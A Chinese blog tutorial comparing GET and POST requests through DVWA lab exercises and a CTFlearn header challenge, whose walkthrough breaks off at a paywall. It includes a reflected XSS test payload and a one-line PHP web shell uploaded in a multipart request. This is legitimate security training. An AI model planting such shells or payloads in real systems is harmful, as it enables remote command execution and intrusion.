从GET到POST:HTTP请求的攻防实战与CTF挑战解析

原创 已于 2025-04-19 23:54:04 修改 · 1.1k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#http #网络协议 #网络

于 2025-04-19 23:53:49 首次发布

初探HTTP请求:当浏览器遇见服务器

基础协议差异可视化

# 典型GET请求
GET /login.php?username=admin&password=p@ssw0rd HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0

# 典型POST请求
POST /login.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

username=admin&password=p@ssw0rd

核心差异对比表:

特性 GET POST
参数位置 URL查询字符串 请求正文
数据可见性 浏览器历史、服务器日志 仅请求正文
长度限制 约2048字符(浏览器差异) 无硬性限制
缓存特性 可缓存 不可缓存
幂等性 是(不应修改数据)

DVWA实战:观察两种请求的渗透差异

实验环境搭建

  1. 启动DVWA(安全级别设为Low)
  2. 访问"Brute Force"模块
  3. 分别测试GET/POST表单

GET方式攻击痕迹:

GET /dvwa/vulnerabilities/brute/?username=admin&password=password&Login=Login HTTP/1.1

攻击参数直接暴露在URL中,可在以下位置追踪:

  • 浏览器历史记录
  • Web服务器访问日志
  • 网络设备流量监控

POST方式攻击示例:

POST /dvwa/vulnerabilities/brute/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

username=admin&password=password&Login=Login

虽然隐蔽性稍强,但未加密传输仍可通过:

  • 流量抓包工具(如Wireshark)
  • 中间人攻击(MITM)
  • 客户端存储的Form Data

Burp Suite拦截分析:透视协议本质

拦截配置步骤

  1. 设置浏览器代理:127.0.0.1:8080
  2. 启动Burp Suite并开启Proxy拦截
  3. 分别提交GET/POST表单

GET请求捕获实例:

GET /vulnerabilities/xss_r/?name=<script>alert(1)</script> HTTP/1.1
Host: localhost
Cookie: PHPSESSID=abc123; security=low

POST请求捕获对比:

POST /vulnerabilities/upload/ HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123
Content-Length: 285

------WebKitFormBoundaryABC123
Content-Disposition: form-data; name="uploaded"; filename="test.php"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>
------WebKitFormBoundaryABC123--

关键发现:

  • GET请求直接将攻击载荷暴露在URL中
  • POST请求可通过多种编码方式隐藏攻击特征
  • 文件上传等复杂操作必须使用POST

CTFlearn实战:HTTP基础题型破解

题目:HTTP Basic (CTFlearn Problem 104)

题干描述:

访问 http://165.227.106.113/header.php 获取flag

解题过程:

  1. 初始访问返回403 Forbidden

  2. 使用curl探测响应头:

    curl -I http://165.227.106.113/header.php

    发现提示:

    HTTP/1.1 403 Forbidden
Hint: Missing required header

  3. 使用Burp Suite重放请求,观察服务器预期:

    GET /header.php HTTP/1.1
Host: 165.227.106.113

  4. 尝试添加常用头部:

    curl -H "User-Agent: CTFlearn" http://165.227.106.113/header.php

  5. 通过迭代测试发现需要特定头部:

    curl -H "Referer: ctflearn.com" http://165.227.106.113/header.php

  6. 最终添加服务器要求的精确头部:

最低0.47元/天 解锁文章
网络安全 | CTF攻防世界 get_post 解题详析
等风来
05-20 6029
题目描述:X老师告诉小宁同学HTTP通常使用两种请求方法,你知道是哪两种吗?使用Hack Bar提交GET参数Payload:?a=1
CTFweb篇——GET&POST
suiyideAli的博客
09-21 2万+
0x00 前言 1. 首先使用BurpSuite 抓取一个http文件进行分析 2. 左边为请求信息,右边为响应信息;请求信息有三部分组成,分别为请求行、请求头、请求正文组成。响应信息也有三部分组成,分别为响应行、响应 头、响应正文。 3. 首先可以看一下请求GET /index.php?tn=monline_3_dg HTTP/1.1 GET方法。GET方法用于获...
CTF-Web入门-get_post
qq_28383747的博客
11-05 1696
本题考查HTTP的两种常见请求方法。对于get请求,可以直接在url后添加请求内容;对于post请求,一种快捷的方法是使用hackbar提供的post请求功能。
Bugku CTF--POST
2401_83809941的博客
03-19 398
网络安全Web学习记录———CTF---Web---SQL注入(GETPOST传参)例题
ZhiYilang的博客
12-13 3201
最开始学习CTF里的web方向时,每次做了题遇到类似的老是忘记之前的解法,所以写点东西记录一下。听大哥的话,就从最开始的GET传参开始吧!!!(大部分都是只得其法,不得其理。希望以后学了更多后能补充上原理)
express.js-ctf:用express.js编写的CTF挑战
05-04
《Express.js CTF挑战解析实战指南》 Express.js,作为Node.js生态系统中最流行的Web应用框架,被广泛用于构建各种类型的Web服务。CTF(Capture The Flag)是一种网络安全竞赛,通常涉及解谜、逆向工程、编程...
CTF-Web学习笔记:服务端请求伪造(SSRF)篇
最新发布
Deng7326的博客
07-29 1439
本文系统介绍了CTF比赛中SSRF漏洞的攻防技术。首先解析了SSRF的核心原理,即利用服务器对用户输入URL的未校验缺陷,诱导其访问内网资源。然后详细分析了5类常见CTF题型:文件读取、内网探测、云服务元数据窃取、协议绕过及组合漏洞利用。重点讲解了绕过URL过滤、利用特殊协议(如dict://、gopher://)等实战技巧,并通过一道SSRF+Redis的高阶题目演示完整攻击链。最后给出防御建议:严格校验输入URL、禁用危险协议、实施内网隔离等。
CTF Web入门题目——Bugku Web 题目题解——发送HTTP请求篇(3道基础题目)
日熙的博客
07-14 6527
1)Bugku web基础$_GET: http://123.206.87.240:8002/get/ 题目: 思路: 关键是分析PHP代码: $what=$_get['what']———意思是用get方式提交what的值 if($what=='flag') echo 'flag{****}';———要令what变量字符串‘flag’相等才 得到flag。 所以我们就直接在地址栏中加上?what=flag。 其中?是变量的标识,这句话表示有一个名为what,值为flag的变量。 答案为:flag{bug
[青少年CTF]POST&GET解题记录
qq_64868579的博客
06-04 1232
青少年CTF训练平台:www.qsnctf.com博主用户名:Fourstar.题目介绍:题目描述:POSTGET是好兄弟,你能否通过这一关让POSTGET两个好兄弟见面呢?
Http 请求 get post
CentOS
11-03 418
简述 Http 请求 get post 的区别以及数据包格式 1GET请求可被缓存,POST请求不能被缓存。 2GET请求被保留着浏览器历史记录中,POST请求不会被保留。 3GET请求能被收藏至书签中,POST请求不能被收藏至书签。 4GET请求不应在处理敏感数据时使用,POST可以用户处理敏感数据。 5GET请求有长度限制,POST请求没有长度限制。 6POST不限制提交的数据类型,所以POST可以提交文件到服务器。 ...
6.【BUUCTF】[极客大挑战 2019] HttpHTTP头伪造)
2401_86760082的博客
02-08 1467
进入题目页面如下ctrl+u查看源码进入查看提示不是来自https://Sycsecret.buuoj.cn用burp suite抓包,右键发送到重放器,添加http请求头绕过提示use "Syclover"提示只允许本地访问此网页。
CTF 中的 XSS 攻击:原理、技巧实战案例
weixin_62428445的博客
03-04 2067
XSS 攻击指的是攻击者通过在 Web 页面中注入恶意 JavaScript 代码,使得这些代码在其他用户的浏览器中执行。通过这种方式,攻击者可以篡改页面内容、窃取用户 Cookie、劫持用户会话,甚至对用户进行钓鱼攻击。
CTF-WEB篇 攻防世界题目实战解析
2301_76565920的博客
04-17 530
题目:robots
CTFGETPOST
qq_74263993的博客
04-06 1073
学过php都知道就一个简单传参,构造payload:?what=flag得到。
get post ctfhub
2403_88472398的博客
11-16 257
1.打开链接之后发现一串代码直接在搜索框内输入链接加/?2.考察域名请求传参http://*.*/?
ctf get post 传参 HackBar
热门推荐
weixin_44614983的博客
01-31 3万+
getposthttp协议的两种基本请求方式 GET - 从指定的资源请求数据。 POST - 向指定的资源提交要被处理的数据 https://www.w3school.com.cn/tags/html_ref_httpmethods.asp 知乎上这篇更详细,关于getpost的区别 https://www.zhihu.com/question/28586791 web题中会遇到,比如...
各种绕过ctf--同时提交getpost请求,sha1数组绕过
qq_32642035的博客
03-09 2552
拿到题目,源码审计 题目要求 1、get提交id=margin 2、get提交uname并且post提交passwd 3、uname的值不等于passwd,但是他们的sha1值相等 所以构造payload
详解 CTF Web 中的快速反弹 POST 请求
小水池
08-11 8948
目录 0x00 前言 0x01 Python Requests 安装并导入 requests 模块 发送 GET 请求 POST 请求 查看请求头 查看响应头 查看响应内容 传递 GET 请求参数 传递 POST 请求参数 传递 Cookie 参数 会话对象 Session() 0x02 writeups 【实验吧 CTF】 Web —— 天下武功唯快不破 【Bugk...
初步了解get请求post请求
月小白
06-12 427
初步了解ctf,学到的第一个知识:get请求post请求的区别首先,在网上信息传输时,http协议给信息传输设定几个服务类别,getpost,put,delete。这四个是服务器交互的最基本的方法。put,delete,postget分别对应资源的增删改查。get用于获取或查询资源信息,post用于更新资源信息。其次,get提交信息时,请求的数据会附在URL之后,以?分割url传输数据,多...
HECTF2023 Web挑战心得:身份验证SSRF攻防
这两道题目展示了参赛者在处理web CTF挑战时,如何运用网络协议理解、HTTP头操作、cookie管理、SSRF漏洞识别、参数解析以及常见的注入技术(包括盲注),这些都是现代网络安全竞赛中常见的知识点。通过解决这些问题...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值